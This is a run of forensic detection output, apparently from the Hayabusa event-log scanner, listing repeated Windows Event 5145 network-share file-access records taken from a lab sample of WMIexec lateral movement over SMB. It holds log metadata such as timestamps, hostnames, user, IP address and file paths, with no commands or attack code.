10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# : IP Address: 
